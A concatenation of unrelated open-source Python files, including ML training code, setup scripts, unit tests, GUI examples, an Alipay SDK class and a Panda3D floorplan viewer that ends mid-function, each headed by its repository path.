if not finetune: # only regularize layers before the final FC
loss += weight_decay * tf.add_n(
tf.nn.l2_loss(v) for v in reg_vars)
all_preds.append(tf.math.argmax(outputs, axis=1).numpy())
if optimizer is not None:
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
for k, acc in accuracies_topk.items():
acc.update_state(labels, outputs, sample_weight=weights)
desc.append(f'Acc@{k} {acc.result().numpy() * 100:.3f}')
tqdm_loader.set_description(' '.join(desc))
if return_extreme_images:
track_extreme_examples(tp_heaps, fp_heaps, fn_heaps, inputs,
labels, img_files, outputs)
confusion_matrix = sklearn.metrics.confusion_matrix(
y_true=np.concatenate(all_labels), y_pred=np.concatenate(all_preds))
metrics = {}
if loss_fn is not None:
metrics['loss'] = losses.result().numpy().item()
for k, acc in accuracies_topk.items():
metrics[f'acc_top{k}'] = acc.result().numpy().item() * 100
heaps = {'tp': tp_heaps, 'fp': fp_heaps, 'fn': fn_heaps}
return metrics, heaps, confusion_matrix
def _parse_args() -> argparse.Namespace:
"""Parses arguments."""
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Trains classifier.')
parser.add_argument(
'dataset_dir',
help='path to directory containing: 1) classification dataset CSV, '
'2) label index JSON, 3) splits JSON')
parser.add_argument(
'cropped_images_dir',
help='path to local directory where image crops are saved')
parser.add_argument(
'--multilabel', action='store_true',
help='for multi-label, multi-class classification')
parser.add_argument(
'-m', '--model-name', default='efficientnet-b0',
choices=list(EFFICIENTNET_MODELS.keys()),
help='which EfficientNet model')
parser.add_argument(
'--pretrained', action='store_true',
help='start with pretrained model')
parser.add_argument(
'--finetune', type=int, default=0,
help='only fine tune the final fully-connected layer for the first '
'<finetune> epochs')
parser.add_argument(
'--label-weighted', action='store_true',
help='weight training samples to balance labels')
parser.add_argument(
'--weight-by-detection-conf', nargs='?', const=True, default=False,
help='weight training examples by detection confidence. '
'Optionally takes a .npz file for isotonic calibration.')
parser.add_argument(
'--epochs', type=int, default=0,
help='number of epochs for training, 0 for eval-only')
parser.add_argument(
'--batch-size', type=int, default=256,
help='batch size for both training and eval')
parser.add_argument(
'--lr', type=float, default=None,
help='initial learning rate, defaults to (0.016 * batch_size / 256)')
parser.add_argument(
'--weight-decay', type=float, default=1e-5,
help='weight decay')
parser.add_argument(
'--seed', type=int,
help='random seed')
parser.add_argument(
'--logdir', default='.',
help='directory where TensorBoard logs and a params file are saved')
parser.add_argument(
'--cache', nargs='*', choices=['train', 'val', 'test'], default=(),
help='which splits of the dataset to cache')
return parser.parse_args()
if __name__ == '__main__':
args = _parse_args()
if args.lr is None:
args.lr = 0.016 * args.batch_size / 256 # based on TF models repo
main(dataset_dir=args.dataset_dir,
cropped_images_dir=args.cropped_images_dir,
multilabel=args.multilabel,
model_name=args.model_name,
pretrained=args.pretrained,
finetune=args.finetune,
label_weighted=args.label_weighted,
weight_by_detection_conf=args.weight_by_detection_conf,
epochs=args.epochs,
batch_size=args.batch_size,
lr=args.lr,
weight_decay=args.weight_decay,
seed=args.seed,
logdir=args.logdir,
cache_splits=args.cache)
|
pybo/inits/__init__.py | hfukada/pybo | 115 | 15722 | <gh_stars>100-1000
"""
Initialization methods.
"""
# pylint: disable=wildcard-import
from .methods import *
from . import methods
__all__ = []
__all__ += methods.__all__
|
setup.py | giampaolo/pysendfile | 119 | 15731 | #!/usr/bin/env python
# ======================================================================
# This software is distributed under the MIT license reproduced below:
#
# Copyright (C) 2009-2014 <NAME>' <<EMAIL>>
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of
# Giampaolo Rodola' not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# <NAME>' DISCLAIM ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT <NAME>' BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# ======================================================================
import sys
try:
from setuptools import Extension, setup
except ImportError:
from distutils.core import Extension, setup
NAME = 'pysendfile'
VERSION = '2.0.1'
if sys.version_info < (2, 5):
sys.exit('python version not supported (< 2.5)')
if 'sunos' in sys.platform:
libraries = ["sendfile"]
else:
libraries = []
def main():
setup(name=NAME,
url='https://github.com/giampaolo/pysendfile',
version=VERSION,
description='A Python interface to sendfile(2)',
long_description=open('README.rst', 'r').read(),
author='<NAME>',
author_email='<EMAIL>',
platforms='UNIX',
license='MIT',
keywords=['sendfile', 'python', 'performance', 'ftp'],
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Operating System :: POSIX :: BSD',
'Operating System :: POSIX :: BSD :: FreeBSD',
'Operating System :: POSIX :: SunOS/Solaris',
'Operating System :: POSIX :: AIX',
'Programming Language :: C',
'Programming Language :: Python :: 2.5',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Topic :: System :: Networking',
'Topic :: System :: Operating System',
'Topic :: Internet :: File Transfer Protocol (FTP)',
'Topic :: Internet :: WWW/HTTP',
'License :: OSI Approved :: MIT License',
],
ext_modules=[Extension('sendfile',
sources=['sendfilemodule.c'],
libraries=libraries)])
if __name__ == '__main__':
main()
|
dynamic_rest/datastructures.py | reinert/dynamic-rest | 690 | 15762 | <gh_stars>100-1000
"""This module contains custom data-structures."""
import six
class TreeMap(dict):
"""Tree structure implemented with nested dictionaries."""
def get_paths(self):
"""Get all paths from the root to the leaves.
For example, given a chain like `{'a':{'b':{'c':None}}}`,
this method would return `[['a', 'b', 'c']]`.
Returns:
A list of lists of paths.
"""
paths = []
for key, child in six.iteritems(self):
if isinstance(child, TreeMap) and child:
# current child is an intermediate node
for path in child.get_paths():
path.insert(0, key)
paths.append(path)
else:
# current child is an endpoint
paths.append([key])
return paths
def insert(self, parts, leaf_value, update=False):
"""Add a list of nodes into the tree.
The list will be converted into a TreeMap (chain) and then
merged with the current TreeMap.
For example, this method would insert `['a','b','c']` as
`{'a':{'b':{'c':{}}}}`.
Arguments:
parts: List of nodes representing a chain.
leaf_value: Value to insert into the leaf of the chain.
update: Whether or not to update the leaf with the given value or
to replace the value.
Returns:
self
"""
tree = self
if not parts:
return tree
cur = tree
last = len(parts) - 1
for i, part in enumerate(parts):
if part not in cur:
cur[part] = TreeMap() if i != last else leaf_value
elif i == last: # found leaf
if update:
cur[part].update(leaf_value)
else:
cur[part] = leaf_value
cur = cur[part]
return self
|
lottery/branch/retrain.py | chenw23/open_lth | 509 | 15764 | # Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import datasets.registry
from foundations import hparams
from foundations.step import Step
from lottery.branch import base
import models.registry
from pruning.mask import Mask
from pruning.pruned_model import PrunedModel
from training import train
class Branch(base.Branch):
def branch_function(
self,
retrain_d: hparams.DatasetHparams,
retrain_t: hparams.TrainingHparams,
start_at_step_zero: bool = False
):
# Get the mask and model.
m = models.registry.load(self.level_root, self.lottery_desc.train_start_step, self.lottery_desc.model_hparams)
m = PrunedModel(m, Mask.load(self.level_root))
start_step = Step.from_iteration(0 if start_at_step_zero else self.lottery_desc.train_start_step.iteration,
datasets.registry.iterations_per_epoch(retrain_d))
train.standard_train(m, self.branch_root, retrain_d, retrain_t, start_step=start_step, verbose=self.verbose)
@staticmethod
def description():
return "Retrain the model with different hyperparameters."
@staticmethod
def name():
return 'retrain'
|
Algo and DSA/LeetCode-Solutions-master/Python/web-crawler.py | Sourav692/FAANG-Interview-Preparation | 3,269 | 15769 | # Time: O(|V| + |E|)
# Space: O(|V|)
# """
# This is HtmlParser's API interface.
# You should not implement it, or speculate about its implementation
# """
class HtmlParser(object):
def getUrls(self, url):
"""
:type url: str
:rtype List[str]
"""
pass
class Solution(object):
def crawl(self, startUrl, htmlParser):
"""
:type startUrl: str
:type htmlParser: HtmlParser
:rtype: List[str]
"""
SCHEME = "http://"
def hostname(url):
pos = url.find('/', len(SCHEME))
if pos == -1:
return url
return url[:pos]
result = [startUrl]
lookup = set(result)
for from_url in result:
name = hostname(from_url)
for to_url in htmlParser.getUrls(from_url):
if to_url not in lookup and name == hostname(to_url):
result.append(to_url)
lookup.add(to_url)
return result
|
settings.py | ArneBinder/Pytorch-LRP | 117 | 15806 | <gh_stars>100-1000
"""
Settings for re-running the experiments from the paper "Layer-wise
relevance propagation for explaining deep neural network decisions
in MRI-based Alzheimer’s disease classification".
Please note that you need to download the ADNI data from
http://adni.loni.usc.edu/ and preprocess it using
https://github.com/ANTsX/ANTs/blob/master/Scripts/antsRegistrationSyNQuick.sh
Please prepare the data, such that you will get three HDF5 files,
consisting of a training, a validation and a holdout (test) set.
Each HDF5 file is required to have 2 datasets, namely X and y,
containing the data matrix and label vector accordingly. We have
included the "Data Split ADNI.ipynb" file as a guideline for data splitting.
Please note that it is highly dependent on the format of your data storage
and needs to be individualized as such.
Furthermore you will need SPM12 https://www.fil.ion.ucl.ac.uk/spm/software/spm12/
in order to access the Neuromorphometrics atlas.
Arguments:
model_path: Path to the trained pytorch model parameters
data_path: Path where the outputs will be stored and retrieved
ADNI_DIR: Path to the root of your downloaded ADNI data
train_h5: Path to the training set HDF5 file
val_h5: Path to the validation set HDF5 file
holdout_h5: Path to the holdout set HDF5 file
binary_brain_mask: Path to the mask used for masking the images,
included in the repository.
nmm_mask_path: Path to the Neuromorphometrics mask. Needs to be
acquired from SPM12. Typically located under
~/spm12/tpm/labels_Neuromorphometrics.nii
nmm_mask_path_scaled: Path to the rescaled Neuromorphometrics mask.
"""
settings = {
"model_path": INSERT,
"data_path": INSERT,
"ADNI_DIR": INSERT,
"train_h5": INSERT,
"val_h5": INSERT,
"holdout_h5": INSERT,
"binary_brain_mask": "binary_brain_mask.nii.gz",
"nmm_mask_path": "~/spm12/tpm/labels_Neuromorphometrics.nii",
"nmm_mask_path_scaled": "nmm_mask_rescaled.nii"
}
|
src/tools/nuscenes-devkit/prediction/tests/test_mtp_loss.py | jie311/TraDeS | 475 | 15842 |
import math
import unittest
import torch
from nuscenes.prediction.models import mtp
class TestMTPLoss(unittest.TestCase):
"""
Test each component of MTPLoss as well as the
__call__ method.
"""
def test_get_trajectories_and_modes(self):
loss_n_modes_5 = mtp.MTPLoss(5, 0, 0)
loss_n_modes_1 = mtp.MTPLoss(1, 0, 0)
xy_pred = torch.arange(60).view(1, -1).repeat(1, 5).view(-1, 60)
mode_pred = torch.arange(5).view(1, -1)
prediction_bs_1 = torch.cat([xy_pred.reshape(1, -1), mode_pred], dim=1)
prediction_bs_2 = prediction_bs_1.repeat(2, 1)
# Testing many modes with batch size 1.
traj, modes = loss_n_modes_5._get_trajectory_and_modes(prediction_bs_1)
self.assertTrue(torch.allclose(traj, xy_pred.unsqueeze(0).reshape(1, 5, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred))
# Testing many modes with batch size > 1.
traj, modes = loss_n_modes_5._get_trajectory_and_modes(prediction_bs_2)
self.assertTrue(torch.allclose(traj, xy_pred.repeat(1, 2).unsqueeze(0).reshape(2, 5, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred.repeat(2, 1)))
xy_pred = torch.arange(60).view(1, -1).repeat(1, 1).view(-1, 60)
mode_pred = torch.arange(1).view(1, -1)
prediction_bs_1 = torch.cat([xy_pred.reshape(1, -1), mode_pred], dim=1)
prediction_bs_2 = prediction_bs_1.repeat(2, 1)
# Testing one mode with batch size 1.
traj, modes = loss_n_modes_1._get_trajectory_and_modes(prediction_bs_1)
self.assertTrue(torch.allclose(traj, xy_pred.unsqueeze(0).reshape(1, 1, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred))
# Testing one mode with batch size > 1.
traj, modes = loss_n_modes_1._get_trajectory_and_modes(prediction_bs_2)
self.assertTrue(torch.allclose(traj, xy_pred.repeat(1, 2).unsqueeze(0).reshape(2, 1, 30, 2)))
self.assertTrue(torch.allclose(modes, mode_pred.repeat(2, 1)))
def test_angle_between_trajectories(self):
def make_trajectory(last_point):
traj = torch.zeros((12, 2))
traj[-1] = torch.Tensor(last_point)
return traj
loss = mtp.MTPLoss(0, 0, 0)
# test angle is 0.
self.assertEqual(loss._angle_between(make_trajectory([0, 0]), make_trajectory([0, 0])), 0.)
self.assertEqual(loss._angle_between(make_trajectory([15, 15]), make_trajectory([15, 15])), 0.)
# test angle is 15.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([math.sqrt(3)/2, 0.5])), 15., places=4)
# test angle is 30.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([math.sqrt(3)/2, 0.5])), 30., places=4)
# test angle is 45.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([0, 1])), 45., places=4)
# test angle is 90.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 1]),
make_trajectory([-1, 1])), 90., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([0, 1])), 90., places=4)
# test angle is 180.
self.assertAlmostEqual(loss._angle_between(make_trajectory([1, 0]),
make_trajectory([-1, 0])), 180., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([0, 1]),
make_trajectory([0, -1])), 180., places=4)
self.assertAlmostEqual(loss._angle_between(make_trajectory([3, 1]),
make_trajectory([-3, -1])), 180., places=4)
def test_compute_best_mode_nothing_below_threshold(self):
angles = [(90, 0), (80, 1), (70, 2)]
target = None
traj = None
loss = mtp.MTPLoss(3, 0, 5)
self.assertTrue(loss._compute_best_mode(angles, target, traj) in {0, 1, 2})
loss = mtp.MTPLoss(3, 0, 65)
self.assertTrue(loss._compute_best_mode(angles, target, traj) in {0, 1, 2})
def test_compute_best_mode_only_one_below_threshold(self):
angles = [(30, 1), (3, 0), (25, 2)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((3, 6, 2))
loss = mtp.MTPLoss(3, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
def test_compute_best_mode_multiple_below_threshold(self):
angles = [(2, 2), (4, 1), (10, 0)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((3, 6, 2))
trajectory[1] = 1
loss = mtp.MTPLoss(3, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 1)
def test_compute_best_mode_only_one_mode(self):
angles = [(25, 0)]
target = torch.ones((1, 6, 2))
trajectory = torch.zeros((1, 6, 2))
loss = mtp.MTPLoss(1, 0, 5)
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
trajectory[0] = 1
self.assertEqual(loss._compute_best_mode(angles, target, trajectory), 0)
def test_loss_single_mode(self):
targets = torch.zeros((16, 1, 30, 2))
targets[:, :, :, 1] = torch.arange(start=0, end=3, step=0.1)
predictions = torch.ones((16, 61))
predictions[:, :60] = targets[0, 0, :, :].reshape(-1, 60)
predictions[:, 60] = 1/10
loss = mtp.MTPLoss(1, 1, angle_threshold_degrees=20)
# Only regression loss in single mode case.
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
0, places=4)
# Now the best mode differs by 1 from the ground truth.
# Smooth l1 loss subtracts 0.5 from l1 norm if diff >= 1.
predictions[:, :60] += 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()), 0.5,
places=4)
# In this case, one element has perfect regression, the others are off by 1.
predictions[1, :60] -= 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
(15/16)*0.5,
places=4)
def test_loss_many_modes(self):
targets = torch.zeros((16, 1, 30, 2))
targets[:, :, :, 1] = torch.arange(start=0, end=3, step=0.1)
predictions = torch.ones((16, 610))
predictions[:, 540:600] = targets[0, 0, :, :].reshape(-1, 60)
predictions[:, -10:] = 1/10
loss = mtp.MTPLoss(10, 1, angle_threshold_degrees=20)
# Since one mode exactly matches gt, loss should only be classification error.
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10), places=4)
# Now the best mode differs by 1 from the ground truth.
# Smooth l1 loss subtracts 0.5 from l1 norm if diff >= 1.
predictions[:, 540:600] += 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10) + 0.5,
places=4)
# In this case, one element has perfect regression, the others are off by 1.
predictions[1, 540:600] -= 1
self.assertAlmostEqual(float(loss(predictions, targets).detach().numpy()),
-math.log(1/10) + (15/16)*0.5,
places=4)
|
Engine/Shaders/compile_all_shader.py | ValtoGameEngines/Fish-Engine | 240 | 15845 | <reponame>ValtoGameEngines/Fish-Engine
import os
import sys
compiler = r'../Binary/RelWithDebInfo/ShaderCompiler'
#compiler = r'../Binary/Debug/ShaderCompiler'
shader_dirs = ['.', './Editor']
count = 0
for d in shader_dirs:
for fn in os.listdir(d):
print(fn)
ext = fn.split('.')[-1]
if ext in ['surf', 'shader']:
cmd = compiler + ' ' + os.path.abspath(os.path.join(d, fn))
print(cmd)
if os.system(cmd) != 0:
print("Compile ERROR: ", fn)
sys.exit()
count += 1
print("Done. {} shaders compiled.".format(count)) |
tf2onnx/optimizer/optimizer_base.py | gcunhase/tensorflow-onnx | 1,473 | 15867 | <reponame>gcunhase/tensorflow-onnx
# SPDX-License-Identifier: Apache-2.0
"""Graph Optimizer Base"""
import copy
from .. import logging, utils
class GraphOptimizerBase(object):
"""optimizer graph to improve performance
"""
def __init__(self):
self._logger = logging.getLogger('.'.join(__name__.split('.')[:-1] + [self.__class__.__name__]))
self._graph_been_opt = False
self.opt_iteration = 0
@property
def logger(self):
return self._logger
@property
def is_debug_mode(self):
return utils.is_debug_mode()
@property
def graph_been_opt(self):
return self._graph_been_opt
@graph_been_opt.setter
def graph_been_opt(self, value):
self._graph_been_opt = value
def optimize(self, graph, iteration):
""" Optimize graph, return optimized graph. """
before = graph.dump_node_statistics()
self.opt_iteration = iteration
graph = self._optimize(graph)
graph.update_proto()
graph.delete_unused_nodes(graph.outputs)
after = graph.dump_node_statistics()
self._print_stat_diff(before, after)
return graph
def _optimize(self, graph):
""" Derived class should override this function. """
raise NotImplementedError
@staticmethod
def _apply_optimization(graph, optimize_func):
"""
optimize graph
will also optimize graph of nodes'
Args:
graph: the top level graph to be optimized
optimize_func: function to optimize graph
"""
graph = optimize_func(graph)
for node in graph.get_nodes():
body_graphs = node.get_body_graphs()
if body_graphs:
for attr, b_g in body_graphs.items():
b_g = GraphOptimizerBase._apply_optimization(b_g, optimize_func)
node.set_body_graph_as_attr(attr, b_g)
return graph
def _print_stat_diff(self, before, after):
diff = copy.deepcopy(after)
diff.subtract(before)
diff = ["{} {} ({}->{})".format(k, str(v) if v < 0 else '+' + str(v), before.get(k, 0), after.get(k, 0))
for k, v in sorted(diff.items()) if v != 0]
self.logger.verbose(', '.join(diff) if diff else "no change")
|
utils/builder/register_builder/riscv/BootPriority.py | noahsherrill/force-riscv | 111 | 15887 | #
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES
# OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
# NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# BootPriority.py
#
# This file defines the BootPriority helper class.
# The boot priority class defines helper methods associated with boot priority
class BootPriority:
# Returns the appropriate boot priority based on the name and type of
# register provided along with if the register is write only
def getBootPriority(aName=None, aType=None, aWriteOnly=0):
return 1
|
tests/conftest.py | inducer/courseflow | 284 | 15889 | <filename>tests/conftest.py<gh_stars>100-1000
import pytest
# from pytest_factoryboy import register
def pytest_addoption(parser):
parser.addoption(
"--slow", action="store_true", default=False, help="run slow tests",
)
parser.addoption(
"--all", action="store_true", default=False, help="run all tests",
)
def _is_connection_psql():
from django.db import connection
return connection.vendor == 'postgresql'
def pytest_collection_modifyitems(config, items):
skip_pg = pytest.mark.skip(reason="connection is not a postgres database")
if not _is_connection_psql():
for item in items:
if "postgres" in item.keywords:
item.add_marker(skip_pg)
if config.getoption("--all"):
return
elif config.getoption("--slow"):
skip_non_slow = pytest.mark.skip(reason="need --slow option to run")
for item in items:
if "slow" not in item.keywords:
item.add_marker(skip_non_slow)
else:
skip_slow = pytest.mark.skip(reason="need --slow option to run")
for item in items:
if "slow" in item.keywords:
item.add_marker(skip_slow)
|
examples/avatar_example.py | ZSD-tim/dayu_widgets | 157 | 15897 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###################################################################
# Author: <NAME>
# Date : 2019.2
# Email : <EMAIL>
###################################################################
from dayu_widgets.avatar import MAvatar
from dayu_widgets.divider import MDivider
from dayu_widgets.field_mixin import MFieldMixin
from dayu_widgets.label import MLabel
from dayu_widgets.push_button import MPushButton
from dayu_widgets import dayu_theme
from dayu_widgets.qt import QWidget, QVBoxLayout, MPixmap, QFormLayout, Qt, QHBoxLayout
class AvatarExample(QWidget, MFieldMixin):
def __init__(self, parent=None):
super(AvatarExample, self).__init__(parent)
self.setWindowTitle('Example for MAvatar')
main_lay = QVBoxLayout()
main_lay.addWidget(MDivider('different size'))
size_list = [('Huge', MAvatar.huge),
('Large', MAvatar.large),
('Medium', MAvatar.medium),
('Small', MAvatar.small),
('Tiny', MAvatar.tiny)]
self.pix_map_list = [None, MPixmap('avatar.png'),
MPixmap('app-maya.png'),
MPixmap('app-nuke.png'),
MPixmap('app-houdini.png')]
form_lay = QFormLayout()
form_lay.setLabelAlignment(Qt.AlignRight)
for label, cls in size_list:
h_lay = QHBoxLayout()
for image in self.pix_map_list:
avatar_tmp = cls(image)
h_lay.addWidget(avatar_tmp)
h_lay.addStretch()
form_lay.addRow(MLabel(label), h_lay)
main_lay.addLayout(form_lay)
self.register_field('image', None)
main_lay.addWidget(MDivider('different image'))
avatar = MAvatar()
self.bind('image', avatar, 'dayu_image')
button = MPushButton(text='Change Avatar Image').primary()
button.clicked.connect(self.slot_change_image)
main_lay.addWidget(avatar)
main_lay.addWidget(button)
main_lay.addStretch()
self.setLayout(main_lay)
def slot_change_image(self):
"""Set the Avatar image random by data bind."""
import random
self.set_field('image', random.choice(self.pix_map_list))
if __name__ == '__main__':
import sys
from dayu_widgets.qt import QApplication
app = QApplication(sys.argv)
test = AvatarExample()
dayu_theme.apply(test)
test.show()
sys.exit(app.exec_())
|
Chapter02/Shuffle.py | Tanishadel/Mastering-Machine-Learning-for-Penetration-Testing | 241 | 15906 | <reponame>Tanishadel/Mastering-Machine-Learning-for-Penetration-Testing<filename>Chapter02/Shuffle.py
import os
import random
#initiate a list called emails_list
emails_list = []
Directory = '/home/azureuser/spam_filter/enron1/emails/'
Dir_list = os.listdir(Directory)
for file in Dir_list:
f = open(Directory + file, 'r')
emails_list.append(f.read())
f.close()
|
alipay/aop/api/domain/RequestExtShopItem.py | snowxmas/alipay-sdk-python-all | 213 | 15918 | <gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class RequestExtShopItem(object):
def __init__(self):
self._brand_code = None
self._category_code = None
self._description = None
self._item_code = None
self._kb_shop_id = None
self._price = None
self._title = None
@property
def brand_code(self):
return self._brand_code
@brand_code.setter
def brand_code(self, value):
self._brand_code = value
@property
def category_code(self):
return self._category_code
@category_code.setter
def category_code(self, value):
self._category_code = value
@property
def description(self):
return self._description
@description.setter
def description(self, value):
self._description = value
@property
def item_code(self):
return self._item_code
@item_code.setter
def item_code(self, value):
self._item_code = value
@property
def kb_shop_id(self):
return self._kb_shop_id
@kb_shop_id.setter
def kb_shop_id(self, value):
self._kb_shop_id = value
@property
def price(self):
return self._price
@price.setter
def price(self, value):
self._price = value
@property
def title(self):
return self._title
@title.setter
def title(self, value):
self._title = value
def to_alipay_dict(self):
params = dict()
if self.brand_code:
if hasattr(self.brand_code, 'to_alipay_dict'):
params['brand_code'] = self.brand_code.to_alipay_dict()
else:
params['brand_code'] = self.brand_code
if self.category_code:
if hasattr(self.category_code, 'to_alipay_dict'):
params['category_code'] = self.category_code.to_alipay_dict()
else:
params['category_code'] = self.category_code
if self.description:
if hasattr(self.description, 'to_alipay_dict'):
params['description'] = self.description.to_alipay_dict()
else:
params['description'] = self.description
if self.item_code:
if hasattr(self.item_code, 'to_alipay_dict'):
params['item_code'] = self.item_code.to_alipay_dict()
else:
params['item_code'] = self.item_code
if self.kb_shop_id:
if hasattr(self.kb_shop_id, 'to_alipay_dict'):
params['kb_shop_id'] = self.kb_shop_id.to_alipay_dict()
else:
params['kb_shop_id'] = self.kb_shop_id
if self.price:
if hasattr(self.price, 'to_alipay_dict'):
params['price'] = self.price.to_alipay_dict()
else:
params['price'] = self.price
if self.title:
if hasattr(self.title, 'to_alipay_dict'):
params['title'] = self.title.to_alipay_dict()
else:
params['title'] = self.title
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = RequestExtShopItem()
if 'brand_code' in d:
o.brand_code = d['brand_code']
if 'category_code' in d:
o.category_code = d['category_code']
if 'description' in d:
o.description = d['description']
if 'item_code' in d:
o.item_code = d['item_code']
if 'kb_shop_id' in d:
o.kb_shop_id = d['kb_shop_id']
if 'price' in d:
o.price = d['price']
if 'title' in d:
o.title = d['title']
return o
|
rendering/viewer.py | MTKat/FloorplanTransformation | 323 | 15932 | from math import pi, sin, cos
from panda3d.core import *
from direct.showbase.ShowBase import ShowBase
from direct.task import Task
from floorplan import Floorplan
import numpy as np
import random
import copy
class Viewer(ShowBase):
def __init__(self):
ShowBase.__init__(self)
#self.scene = self.loader.loadModel("floorplan_1.txt-floor.obj")
#self.scene = base.loader.loadModel("floorplan_1.txt-floor.egg")
#self.scene = base.loader.loadModel("panda.egg")
#self.scene = base.loader.loadModel("environment")
base.setBackgroundColor(0, 0, 0)
self.angle = 0.0
lens = PerspectiveLens()
lens.setFov(60)
lens.setNear(0.01)
lens.setFar(100000)
base.cam.node().setLens(lens)
floorplan = Floorplan('test/floorplan_7')
#floorplan.setFilename('test/floorplan_2')
floorplan.read()
self.scene = floorplan.generateEggModel()
self.scene.reparentTo(self.render)
#self.scene.setScale(0.01, 0.01, 0.01)
#self.scene.setTwoSided(True)
self.scene.setTwoSided(True)
#self.scene.setPos(0, 0, 3)
#texture = loader.loadTexture("floorplan_1.png")
#self.scene.setTexture(texture)
#self.scene.setHpr(0, 0, 0)
# angleDegrees = 0
# angleRadians = angleDegrees * (pi / 180.0)
# self.camera.setPos(20 * sin(angleRadians), -20 * cos(angleRadians), 3)
# self.camera.setHpr(angleDegrees, 0, 0)
#self.camera.lookAt(0, 0, 0)
self.alight = AmbientLight('alight')
self.alight.setColor(VBase4(0.2, 0.2, 0.2, 1))
self.alnp = self.render.attachNewNode(self.alight)
self.render.setLight(self.alnp)
dlight = DirectionalLight('dlight')
dlight.setColor(VBase4(1, 1, 1, 1))
dlnp = self.render.attachNewNode(dlight)
#dlnp.setHpr(0, -90, 0)
dlnp.setPos(0.5, 0.5, 3)
dlnp.lookAt(0.5, 0.5, 2)
self.render.setLight(dlnp)
for i in xrange(10):
plight = PointLight('plight')
plight.setAttenuation((1, 0, 1))
color = random.randint(10, 15)
plight.setColor(VBase4(color, color, color, 1))
plnp = self.render.attachNewNode(plight)
if i == 0:
plnp.setPos(0.5, 0.5, 3)
else:
plnp.setPos(1 * random.random(), 1 * random.random(), 0.3)
pass
self.render.setLight(plnp)
#base.useTrackball()
#base.trackball.node().setPos(2.0, 0, 3)
#base.trackball.node().setHpr(0, 0, 3)
#base.enableMouse()
#base.useDrive()
base.disableMouse()
self.taskMgr.add(self.spinCameraTask, "SpinCameraTask")
#self.accept('arrow_up', self.moveForward)
#self.accept('arrow_up_-repeat', self.moveForward)
self.topDownCameraPos = [0.5, 0.5, 1.5]
self.topDownTarget = [0.5, 0.499, 0.5]
self.topDownH = 0
self.startCameraPos = floorplan.startCameraPos
self.startTarget = floorplan.startTarget
self.startH = 0
self.cameraPos = self.topDownCameraPos
self.target = self.topDownTarget
self.H = self.topDownH
self.accept('space', self.openDoor)
self.accept('enter', self.startChangingView)
self.viewMode = 'T'
self.viewChangingProgress = 1.02
ceiling = self.scene.find("**/ceiling")
ceiling.hide()
return
def moveForward(self):
self.cameraPos[0] -= 0.1
def openDoor(self):
minDistance = 10000
doors = self.scene.find("**/doors")
for door in doors.getChildren():
mins, maxs = door.getTightBounds()
vec_1 = (mins + maxs) / 2 - Vec3(self.target[0], self.target[1], (mins[2] + maxs[2]) / 2)
vec_2 = (mins + maxs) / 2 - Vec3(self.cameraPos[0], self.cameraPos[1], (mins[2] + maxs[2]) / 2)
